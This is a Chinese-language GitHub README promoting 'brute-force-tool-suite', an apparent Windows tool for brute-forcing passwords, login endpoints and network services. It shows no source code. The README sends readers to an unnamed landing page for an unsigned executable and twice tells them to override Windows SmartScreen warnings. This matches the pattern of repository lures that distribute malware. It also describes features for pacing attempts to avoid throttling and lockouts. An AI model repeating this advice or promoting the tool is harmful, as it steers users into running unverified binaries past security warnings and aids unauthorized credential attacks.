Brookflofortress82/brute-force-tool-suite

GitHub: Brookflofortress82/brute-force-tool-suite

一款透明且可复现的凭据穷举测试引擎,用于密码安全审计、登录端点强度验证和个人密码恢复。

Stars: 0 | Forks: 0

Brute Force Tool banner # brute-force-tool-suite 🔐⚙️ ![Version](https://img.shields.io/badge/version-2026-blue?style=for-the-badge) ![Windows](https://img.shields.io/badge/platform-Windows-0078d4?style=for-the-badge&logo=windows&logoColor=white) ![License](https://img.shields.io/badge/license-MIT-green?style=for-the-badge) *一个严谨、透明的穷举凭据与密钥空间测试引擎 —— 专为需要确切结果而非盲目猜测的人而打造。*

Download

## 🧭 概述 密码恢复和凭据审计面临着一个共同的瓶颈:可能输入的空间极其庞大,单纯依靠手动测试根本无法扩展。无论你是被锁定在归档文件之外、继承了一个遗忘密码的设备,还是需要验证登录表单是否真的能够抵御持续的自动化尝试,其底层任务都是相同的 —— 系统性地遍历候选空间,直到找到匹配项或耗尽整个空间。 **brute-force-tool-suite** 的存在就是为了让这种遍历变得快速、可观察且可复现。该项目没有将暴力破解视为一个黑盒,而是将流程的每个阶段(候选生成、吞吐量调优和结果验证)都作为一个独立且可检查的组件呈现出来。因此,该工具的行为不像是一个粗暴的仪器,而更像是一个实验室工作台:你配置实验、观察运行过程并读取结果。 该套件面向执行授权审计的安全研究人员、恢复自己所有系统访问权限的 IT 管理员、在法律授权范围内工作的数字取证从业者,以及单纯希望了解密钥空间穷举在实际中如何运作的爱好者。它假设你有权测试相关目标 —— 工具提供的是机制,而合法使用的责任仍由操作者承担。

Download

## 🚀 本引擎的突出之处 1. **自适应吞吐量扩展** —— 引擎会在短暂的预热阶段对目标的响应延迟进行基准测试,并自动调整请求并发量,从而避免无用的空闲周期和目标端的限流。 2. **可组合的候选生成器** —— 字典、基于掩码的模式和规则变异字典可以叠加使用,因此单次会话可以将已知字典与算法排列结合,而不是被迫在两者之间做出选择。 3. **实时会话遥测** —— 实时仪表盘会报告每秒尝试次数、预计剩余时间以及滚动的成功概率曲线,因此长时间运行的会话绝不再是盲目的猜测。 4. **支持检查点的恢复能力** —— 会话状态会按可配置的间隔进行持久化,这意味着长达数天的密钥空间扫描可以在重启、断电或主动暂停后幸存下来,而不会丢失进度。 5. **感知协议的模块** —— 独立的处理程序模块了解不同目标类型(归档格式、本地登录提示、网络服务)的握手特性,因此定时和重试逻辑是针对每个协议进行调优的,而不是统一套用的。 6. **隔离的尝试沙盒** —— 每个候选测试都在自己轻量级的执行上下文中运行,防止单个格式错误的尝试导致整个会话停滞或损坏。 7. **结构化的结果导出** —— 匹配项、近似匹配项和完整的尝试日志可以导出为 CSV 或 JSON 格式,这对于审计跟踪和下游报告非常有用。 8. **速率限制的礼貌模式** —— 可选的限流配置文件会有意减慢引擎速度,以模仿人类节奏的尝试,这在测试目标自身的防御是否能正确检测和响应持续探测时非常有用。 ## 🏁 快速开始 1. 访问上面下载按钮中链接的项目落地页。 2. 下载适用于 Windows 的最新独立构建版本 —— 无需安装向导,没有捆绑的附加软件。 3. 直接运行可执行文件。由于该二进制文件未受大型发行商签名,首次启动时 Windows SmartScreen 可能会弹出提示;这对于独立维护的工具来说是正常的。 4. 配置你的会话 —— 目标类型、候选源和吞吐量配置 —— 然后从主仪表盘开始运行。 ## 💻 系统要求 | 组件 | 最低配置 | 推荐配置 | |---|---|---| | 操作系统 | Windows 10 (64-bit) | Windows 11 (64-bit) | | 内存 | 4 GB | 8 GB+ | | 存储 | 150 MB 可用空间 | 500 MB 可用空间(用于大型字典) | | 依赖项 | 无 —— 完全独立 | 无 | | 网络 | 仅在针对远程目标的会话中需要 | 建议使用稳定的连接 | ## 🧩 工作原理 引擎遵循刻意设计的线性 pipeline,以便每个阶段都可以被分析、记录,并在需要时独立于其他阶段进行暂停。 1. **配置解析** —— 你选择的目标、候选源和吞吐量配置文件将被验证并编译为内部会话计划。 2. **候选生成** —— 相应的生成器(字典读取器、掩码扩展器或规则引擎)开始流式传输候选对象,而不是一次性将整个密钥空间加载到内存中。 3. **调度与测试** —— 候选对象以自适应大小的批次分派给协议处理程序,每次尝试都被沙盒化并计时。 4. **结果评估** —— 根据成功条件对响应进行评分;匹配会触发立即停止会话并导出,不匹配则反馈到吞吐量调优中。 5. **检查点与报告** —— 系统会按间隔对进度设置检查点,无论会话是匹配、耗尽还是手动停止,都会生成最终报告。 ``` flowchart LR Config --> Generate Generate --> Dispatch Dispatch --> Evaluate Evaluate --> Report ``` ## 🛟 故障排除 **问:会话在启动后报告每秒尝试次数为零。** 答:这通常意味着目标处理程序卡在了等待握手的阶段。请检查目标地址或文件路径是否正确,以及协议模块是否与目标类型匹配。 **问:首次运行时 Windows 标记了该可执行文件。** 答:这是未签名独立二进制文件的标准 SmartScreen 行为。请验证下载是否来自官方落地页,如果你信任该来源,请选择“仍然运行”。 **问:我的会话因重启而中断 —— 进度会丢失吗?** 答:不会。系统会根据你在会话配置文件中设置的间隔自动运行检查点。重新启动工具并从启动屏幕中选择“恢复会话”即可。 **问:在长时间运行的过程中,吞吐量突然大幅下降。** 答:自适应扩展器可能检测到了目标延迟增加或限流,并为了避免账户锁定而有意退避。这是预期行为,而非故障。 **问:我可以同时运行多个会话吗?** 答:可以,每个会话都在独立的上下文中运行,但请注意 combined 带来的 CPU 和网络负载 —— 同时运行过多会导致所有会话都变慢。 **问:尽管运行已完成,但导出文件为空。** 答:请确认在“设置”中配置的导出路径具有写入权限。该工具不会静默失败,但权限错误有时会被杀毒软件的沙盒机制所掩盖。 ## 🎨 UI / UX 细节
键盘快捷键 | 快捷键 | 操作 | |---|---| | `Ctrl + N` | 新建会话 | | `Ctrl + S` | 保存当前会话配置 | | `Space` | 暂停/恢复活动运行 | | `Ctrl + E` | 导出当前结果 | | `Ctrl + L` | 切换实时日志面板 | | `F1` | 打开应用内帮助 |
主题与外观 仪表盘自带浅色主题、深色主题和高对比度辅助主题。主题选择会按用户保存在本地设置文件中,并且无需重启即可立即应用。
会话设置 - 吞吐量配置:礼貌、均衡、最大 - 检查点间隔:可配置为 30 秒到 30 分钟 - 完成时通知:桌面 toast、声音或静音 - 日志详细程度:最小、标准、详细
## 📜 许可证 基于 [MIT License](LICENSE) 发布,2026 年。你可以根据许可条款自由使用、修改和重新分发本软件。 ## ⚖️ 免责声明 本软件仅用于合法的安全研究、授权的渗透测试,以及在属于你所有或获得明确授权测试的系统和账户上进行个人密码恢复。本项目的维护者对任何误用行为不承担任何责任。用户需自行确保其活动符合其所在司法管辖区的适用法律法规。

Download

标签:PoC, 后端开发, 密码审计, 暴力破解